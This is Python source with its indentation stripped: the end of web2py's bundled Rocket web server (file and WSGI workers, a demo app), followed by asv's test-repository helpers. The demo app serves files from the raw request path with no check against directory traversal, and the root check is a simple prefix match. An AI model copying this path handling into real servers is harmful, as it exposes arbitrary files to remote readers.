c = self.read(1)
while c and c != b('\n'):
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
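# Minimal decoding sketch (io.BytesIO stands in for the socket file object):
# two chunks, "abc" and "de", followed by the terminating zero-length chunk.
#
#   import io
#   raw = io.BytesIO(b'3\r\nabc\r\n2\r\nde\r\n0\r\n\r\n')
#   reader = ChunkedReader(raw)
#   reader.read(5)   # -> b'abcde' (the read spans both chunks)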
def get_method(method):
methods = dict(wsgi=WSGIWorker,
fs=FileSystemWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket\worker.py
# Monolithic build...start of module: rocket\methods\__init__.py
# Monolithic build...end of module: rocket\methods\__init__.py
# Monolithic build...start of module: rocket\methods\fs.py
# Import System Modules
import os
import time
import mimetypes
from email.utils import formatdate
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
CHUNK_SIZE = 2**16 # 64 Kilobyte chunks
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
INDEX_HEADER = '''\
<html>
<head><title>Directory Index: %(path)s</title>
<style> .parent { margin-bottom: 1em; }</style>
</head>
<body><h1>Directory Index: %(path)s</h1>
<table>
<tr><th>Directories</th></tr>
'''
INDEX_ROW = '''<tr><td><div class="%(cls)s"><a href="/%(link)s">%(name)s</a></div></td></tr>'''
INDEX_FOOTER = '''</table></body></html>\r\n'''
class LimitingFileWrapper(FileWrapper):
def __init__(self, limit=None, *args, **kwargs):
self.limit = limit
FileWrapper.__init__(self, *args, **kwargs)
def read(self, amt):
if amt > self.limit:
amt = self.limit
self.limit -= amt
return FileWrapper.read(self, amt)
class FileSystemWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
self.root = os.path.abspath(self.app_info['document_root'])
self.display_index = self.app_info['display_index']
def serve_file(self, filepath, headers):
filestat = os.stat(filepath)
self.size = filestat.st_size
modtime = time.strftime("%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(filestat.st_mtime))
self.headers.add_header('Last-Modified', modtime)
if headers.get('if_modified_since') == modtime:
# The browser cache is up-to-date, send a 304.
self.status = "304 Not Modified"
self.data = []
return
ct = mimetypes.guess_type(filepath)[0]
self.content_type = ct if ct else 'text/plain'
try:
f = open(filepath, 'rb')
self.headers['Pragma'] = 'cache'
self.headers['Cache-Control'] = 'private'
self.headers['Content-Length'] = str(self.size)
if self.etag:
self.headers.add_header('Etag', self.etag)
if self.expires:
self.headers.add_header('Expires', self.expires)
try:
# Implement 206 partial file support.
start, end = headers['range'].split('-')
start = 0 if not start.isdigit() else int(start)
end = self.size if not end.isdigit() else int(end)
if self.size < end or start < 0:
self.status = "214 Unsatisfiable Range Requested"
self.data = FileWrapper(f, CHUNK_SIZE)
else:
f.seek(start)
self.data = LimitingFileWrapper(f, CHUNK_SIZE, limit=end)
self.status = "206 Partial Content"
except:
self.data = FileWrapper(f, CHUNK_SIZE)
except IOError:
self.status = "403 Forbidden"
def serve_dir(self, pth, rpth):
def rel_path(path):
return os.path.normpath(path[len(self.root):] if path.startswith(self.root) else path)
if not self.display_index:
self.status = '404 File Not Found'
return b('')
else:
self.content_type = 'text/html'
dir_contents = [os.path.join(pth, x) for x in os.listdir(os.path.normpath(pth))]
dir_contents.sort()
dirs = [rel_path(x)+'/' for x in dir_contents if os.path.isdir(x)]
files = [rel_path(x) for x in dir_contents if os.path.isfile(x)]
self.data = [INDEX_HEADER % dict(path='/'+rpth)]
if rpth:
self.data += [INDEX_ROW % dict(name='(parent directory)', cls='dir parent', link='/'.join(rpth[:-1].split('/')[:-1]))]
self.data += [INDEX_ROW % dict(name=os.path.basename(x[:-1]), link=os.path.join(rpth, os.path.basename(x[:-1])).replace('\\', '/'), cls='dir') for x in dirs]
self.data += ['<tr><th>Files</th></tr>']
self.data += [INDEX_ROW % dict(name=os.path.basename(x), link=os.path.join(rpth, os.path.basename(x)).replace('\\', '/'), cls='file') for x in files]
self.data += [INDEX_FOOTER]
self.headers['Content-Length'] = self.size = str(sum([len(x) for x in self.data]))
self.status = '200 OK'
def run_app(self, conn):
self.status = "200 OK"
self.size = 0
self.expires = None
self.etag = None
self.content_type = 'text/plain'
self.content_length = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
sock_file = conn.makefile('rb',BUF_SIZE)
request = self.read_request_line(sock_file)
if request['method'].upper() not in ('GET', ):
self.status = "501 Not Implemented"
try:
# Get our file path
headers = dict([(str(k.lower()), v) for k, v in self.read_headers(sock_file).items()])
rpath = request.get('path', '').lstrip('/')
filepath = os.path.join(self.root, rpath)
filepath = os.path.abspath(filepath)
if __debug__:
self.err_log.debug('Request for path: %s' % filepath)
self.closeConnection = headers.get('connection', 'close').lower() == 'close'
self.headers = Headers([('Date', formatdate(usegmt=True)),
('Server', HTTP_SERVER_SOFTWARE),
('Connection', headers.get('connection', 'close')),
])
if not filepath.lower().startswith(self.root.lower()):
# File must be within our root directory
self.status = "400 Bad Request"
self.closeConnection = True
elif not os.path.exists(filepath):
self.status = "404 File Not Found"
self.closeConnection = True
elif os.path.isdir(filepath):
self.serve_dir(filepath, rpath)
elif os.path.isfile(filepath):
self.serve_file(filepath, headers)
else:
# It exists but it's not a file or a directory????
# What is it then?
self.status = "501 Not Implemented"
self.closeConnection = True
h = self.headers
statcode, statstr = self.status.split(' ', 1)
statcode = int(statcode)
if statcode >= 400:
h.add_header('Content-Type', self.content_type)
self.data = [statstr]
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
for data in self.data:
self.conn.sendall(b(data))
if hasattr(self.data, 'close'):
self.data.close()
finally:
if __debug__:
self.err_log.debug('Finally closing sock_file')
sock_file.close()
# Monolithic build...end of module: rocket\methods\fs.py
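# Hypothetical launch sketch for this file-system worker (the Rocket
# constructor signature is assumed from the demo() call at the bottom of this
# build; the app_info keys come from FileSystemWorker above): serve ./public
# on port 8000 with directory listings enabled.
#
#   r = Rocket(('127.0.0.1', 8000), 'fs',
#              {'document_root': 'public', 'display_index': True})
#   r.start()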
# Monolithic build...start of module: rocket\methods\wsgi.py
# Import System Modules
import sys
import socket
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
if PY3K:
from email.utils import formatdate
else:
# Caps Utils for Py2.4 compatibility
from email.Utils import formatdate
# Define Constants
NEWLINE = b('\r\n')
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
BASE_ENV = {'SERVER_NAME': SERVER_NAME,
'SCRIPT_NAME': '', # Direct call WSGI does not need a name
'wsgi.errors': sys.stderr,
'wsgi.version': (1, 0),
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'wsgi.file_wrapper': FileWrapper
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get('max_threads') != 1
else:
multithreaded = False
self.base_environ = dict({'SERVER_SOFTWARE': self.app_info['server_software'],
'wsgi.multithread': multithreaded,
})
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get('wsgi_app')
if not hasattr(self.app, "__call__"):
raise TypeError("The wsgi_app specified (%s) is not a valid WSGI application." % repr(self.app))
# Enable futures
if has_futures and self.app_info.get('futures'):
executor = self.app_info['executor']
self.base_environ.update({"wsgiorg.executor": executor,
"wsgiorg.futures": executor.futures})
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
for k, v in self.read_headers(sock_file).items():
environ[str('HTTP_'+k)] = v
# Add CGI Variables
environ['REQUEST_METHOD'] = request['method']
environ['PATH_INFO'] = request['path']
environ['SERVER_PROTOCOL'] = request['protocol']
environ['SERVER_PORT'] = str(conn.server_port)
environ['REMOTE_PORT'] = str(conn.client_port)
environ['REMOTE_ADDR'] = str(conn.client_addr)
environ['QUERY_STRING'] = request['query_string']
if 'HTTP_CONTENT_LENGTH' in environ:
environ['CONTENT_LENGTH'] = environ['HTTP_CONTENT_LENGTH']
if 'HTTP_CONTENT_TYPE' in environ:
environ['CONTENT_TYPE'] = environ['HTTP_CONTENT_TYPE']
# Save the request method for later
self.request_method = environ['REQUEST_METHOD']
# Add Dynamic WSGI Variables
if conn.ssl:
environ['wsgi.url_scheme'] = 'https'
environ['HTTPS'] = 'on'
else:
environ['wsgi.url_scheme'] = 'http'
if conn.ssl:
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ['SSL_CLIENT_RAW_CERT'] = \
peercert and ssl.DER_cert_to_PEM_cert(peercert)
except Exception as e:
print(e)
if environ.get('HTTP_TRANSFER_ENCODING', '') == 'chunked':
environ['wsgi.input'] = ChunkedReader(sock_file)
else:
environ['wsgi.input'] = sock_file
return environ
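# For a hypothetical request "GET /app?x=1 HTTP/1.1" with "Host: example.org",
# build_environ() would yield (on top of the BASE_ENV keys) roughly:
#   REQUEST_METHOD='GET', PATH_INFO='/app', QUERY_STRING='x=1',
#   SERVER_PROTOCOL='HTTP/1.1', HTTP_HOST='example.org',
#   'wsgi.url_scheme'='http' (or 'https' plus HTTPS='on' over SSL)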
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get('transfer-encoding', '').lower() == 'chunked'
# Add a Date header if it's not there already
if not 'date' in h_set:
h_set['Date'] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not 'server' in h_set:
h_set['Server'] = HTTP_SERVER_SOFTWARE
if 'content-length' in h_set:
self.size = int(h_set['content-length'])
else:
s = int(self.status.split(' ')[0])
if s < 200 or s not in (204, 205, 304):
if not self.chunked:
if sections == 1:
# Add a Content-Length header if it's not there already
h_set['Content-Length'] = str(len(data))
self.size = len(data)
else:
# If they sent us more than one section, we blow chunks
h_set['Transfer-Encoding'] = 'Chunked'
self.chunked = True
if __debug__:
self.err_log.debug('Adding header...'
'Transfer-Encoding: Chunked')
if 'connection' not in h_set:
# If the application did not provide a connection header, fill it in
client_conn = self.environ.get('HTTP_CONNECTION', '').lower()
if self.environ['SERVER_PROTOCOL'] == 'HTTP/1.1':
# HTTP/1.1 defaults to keep-alive connections
if client_conn:
h_set['Connection'] = client_conn
else:
h_set['Connection'] = 'keep-alive'
else:
# HTTP < 1.1 supports keep-alive but it's quirky so we don't support it
h_set['Connection'] = 'close'
# Close our connection if we need to.
self.closeConnection = h_set.get('connection', '').lower() == 'close'
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning('WSGI app called write method directly. This is '
'deprecated behavior. Please update your app.')
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = b(self.error[1])
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != 'HEAD':
try:
if self.chunked:
self.conn.sendall(b('%x\r\n%s\r\n' % (len(data), data)))
else:
self.conn.sendall(data)
except socket.error:
# Some clients close the connection before all data is sent,
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
""" Store the HTTP status and headers to be sent when self.write is
called. """
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if PY3K and not isinstance(status, str):
self.status = str(status, 'ISO-8859-1')
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ('500 Internal Server Error',
'HTTP Headers should be bytes')
self.err_log.error('Received HTTP Headers from client that contain'
' invalid characters for Latin-1 encoding.')
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
if PY3K:
sock_file = conn.makefile(mode='rb', buffering=BUF_SIZE)
else:
sock_file = conn.makefile(BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get('HTTP_EXPECT', '') == '100-continue':
res = environ['SERVER_PROTOCOL'] + ' 100 Continue\r\n\r\n'
conn.sendall(b(res))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, '__len__') and not hasattr(output, '__iter__'):
self.error = ('500 Internal Server Error',
'WSGI applications must return a list or '
'generator type.')
if hasattr(output, '__len__'):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if self.chunked:
# If chunked, send our final chunk length
self.conn.sendall(b('0\r\n\r\n'))
elif not self.headers_sent:
# Send headers if the body was empty
self.send_headers('', sections)
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug('Finally closing output and sock_file')
if hasattr(output,'close'):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket\methods\wsgi.py
#
# the following code is not part of Rocket but was added in web2py for testing purposes
#
def demo_app(environ, start_response):
global static_folder
import os
types = {'htm': 'text/html','html': 'text/html','gif': 'image/gif',
'jpg': 'image/jpeg','png': 'image/png','pdf': 'application/pdf'}
if static_folder:
if not static_folder.startswith('/'):
static_folder = os.path.join(os.getcwd(),static_folder)
path = os.path.join(static_folder, environ['PATH_INFO'][1:] or 'index.html')
type = types.get(path.split('.')[-1],'text/plain')
if os.path.exists(path):
try:
data = open(path,'rb').read()
start_response('200 OK', [('Content-Type', type)])
except IOError:
start_response('404 NOT FOUND', [])
data = '404 NOT FOUND'
else:
start_response('500 INTERNAL SERVER ERROR', [])
data = '500 INTERNAL SERVER ERROR'
else:
start_response('200 OK', [('Content-Type', 'text/html')])
data = '<html><body><h1>Hello from Rocket Web Server</h1></body></html>'
return [data]
def demo():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-i", "--ip", dest="ip",default="127.0.0.1",
help="ip address of the network interface")
parser.add_option("-p", "--port", dest="port",default="8000",
help="post where to run web server")
parser.add_option("-s", "--static", dest="static",default=None,
help="folder containing static files")
(options, args) = parser.parse_args()
global static_folder
static_folder = options.static
print('Rocket running on %s:%s' % (options.ip, options.port))
r=Rocket((options.ip,int(options.port)),'wsgi', {'wsgi_app':demo_app})
r.start()
if __name__=='__main__':
demo()
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
import shutil
import subprocess
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
import asv
from asv import util
from asv import commands
from asv import config
from asv import environment
from asv import runner
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
from asv.plugins.conda import _find_conda
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
DUMMY1_VERSION = "0.14"
DUMMY2_VERSIONS = ["0.3.7", "0.3.9"]
WIN = (os.name == "nt")
try:
util.which('pypy')
HAS_PYPY = True
except (RuntimeError, IOError):
HAS_PYPY = hasattr(sys, 'pypy_version_info') and (sys.version_info[:2] == (2, 7))
try:
# Conda can install required Python versions on demand
_find_conda()
HAS_CONDA = True
except (RuntimeError, IOError):
HAS_CONDA = False
try:
import virtualenv
HAS_VIRTUALENV = True
except ImportError:
HAS_VIRTUALENV = False
try:
util.which('python{}'.format(PYTHON_VER2))
HAS_PYTHON_VER2 = True
except (RuntimeError, IOError):
HAS_PYTHON_VER2 = False
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
from lockfile import LockFile
def get_default_environment_type(conf, python):
return environment.get_environment_class(conf, python).tool_name
@contextmanager
def locked_cache_dir(config, cache_key, timeout=900, tag=None):
base_dir = config.cache.makedir(cache_key)
lockfile = join(six.text_type(base_dir), 'lock')
cache_dir = join(six.text_type(base_dir), 'cache')
lock = LockFile(lockfile)
lock.acquire(timeout=timeout)
try:
# Clear cache dir contents if it was generated with different
# asv version
tag_fn = join(six.text_type(base_dir), 'tag.json')
tag_content = [asv.__version__, repr(tag)]
if os.path.isdir(cache_dir):
try:
if util.load_json(tag_fn) != tag_content:
raise ValueError()
except (IOError, ValueError, util.UserError):
shutil.rmtree(cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
yield cache_dir
util.write_json(tag_fn, tag_content)
finally:
lock.release()
def run_asv(*argv, **kwargs):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args, **kwargs)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
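# Hedged usage sketch (command strings are illustrative, not exhaustive):
# both helpers parse an asv command line; run_asv_with_conf additionally binds
# the parsed command to an explicit Config instance (dvcs is assumed to come
# from generate_test_repo below).
#
#   run_asv('machine', '--yes')
#   conf = config.Config.from_json({'repo': dvcs.path, 'project': 'asv'})
#   run_asv_with_conf(conf, 'run', '--quick')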
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
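# Sketch of driving the Git helper in a test (the path is illustrative):
#
#   g = Git('/tmp/scratch-repo')
#   g.init()
#   open(join(g.path, 'README'), 'w').close()
#   g.add(join(g.path, 'README'))
#   g.commit('initial commit')
#   head = g.get_hash('master')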
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
self._repo = None
def __del__(self):
if self._repo is not None:
self._repo.close()
self._repo = None
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works for both Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
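# Example call (values and the branch name are illustrative): three revisions
# on the default branch plus a two-commit branch started at master~1.
#
#   dvcs = generate_test_repo(tmpdir, values=[1, 2, 3], dvcs_type='git',
#                             extra_branches=[('master~1', 'some-branch', [4, 5])])
#   dvcs.get_branch_hashes('some-branch')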
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None, {})
value = runner.BenchmarkResult(
result=[value],
samples=[None],
number=[None],
errcode=0,
stderr='',
profile=None)
result.add_result({"name": "time_func", "version": benchmark_version, "params": []},
value, started_at=timestamp, duration=1.0)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=2)
return conf
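# Sketch (the commit hashes must exist in the dvcs repository, e.g. one built
# with generate_test_repo above):
#
#   commits = dvcs.get_branch_hashes()
#   conf = generate_result_dir(tmpdir, dvcs, {commits[0]: 3.0, commits[1]: 5.0})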
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
options = selenium.webdriver.FirefoxOptions()
options.add_argument("-headless")
return selenium.webdriver.Firefox(options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
finally:
httpd.server_close()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- in some environments, problems may
# arise when shutting down the server.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
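# How the preview server and the retry helper combine in the browser tests
# (browser and html_dir are assumed to come from the fixtures/config above):
#
#   with preview(html_dir) as base_url:
#       get_with_retry(browser, base_url + '/index.html')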
@pytest.fixture
def dummy_packages(request, monkeypatch):
"""
Build dummy wheels for required packages and set PIP_FIND_LINKS + CONDARC
"""
to_build = [('asv_dummy_test_package_1', DUMMY1_VERSION)]
to_build += [('asv_dummy_test_package_2', ver) for ver in DUMMY2_VERSIONS]
tag = [PYTHON_VER1, PYTHON_VER2, to_build, HAS_CONDA]
with locked_cache_dir(request.config, "asv-wheels", timeout=900, tag=tag) as cache_dir:
wheel_dir = os.path.abspath(join(six.text_type(cache_dir), 'wheels'))
monkeypatch.setenv(str('PIP_FIND_LINKS'), str('file://' + wheel_dir))
condarc = join(wheel_dir, 'condarc')
monkeypatch.setenv(str('CONDARC'), str(condarc))
if os.path.isdir(wheel_dir):
return
tmpdir = join(six.text_type(cache_dir), "tmp")
if os.path.isdir(tmpdir):
shutil.rmtree(tmpdir)
os.makedirs(tmpdir)
try:
os.makedirs(wheel_dir)
_build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=HAS_CONDA)
except:
shutil.rmtree(wheel_dir)
raise
# Conda packages were installed in a local channel
if not WIN:
wheel_dir_str = "file://{0}".format(wheel_dir)
else:
wheel_dir_str = wheel_dir
